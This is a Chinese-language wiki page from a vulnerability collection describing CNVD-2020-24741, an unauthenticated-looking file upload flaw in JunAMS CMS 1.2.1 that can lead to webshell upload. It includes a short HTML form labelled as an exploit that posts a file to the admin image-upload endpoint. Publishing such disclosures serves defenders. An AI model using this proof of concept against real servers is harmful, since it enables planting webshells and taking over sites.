menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md
    607 B / 2021-05-21 09:14:38
        # CNVD-2020-24741 JunAms内容管理系统文件上传漏洞


JunAMS是一款以ThinkPHP为框架的开源内容管理系统。

JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。

影响版本:JunAMS junAMS 1.2.1.20190403

EXPLOIT:


```html
<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">  
<input type="file" name="file" size="50"><br>  
<input type="submit" value="Upload">  
</form>

```

via:beautymanor

ref:

https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741
    links
    file_download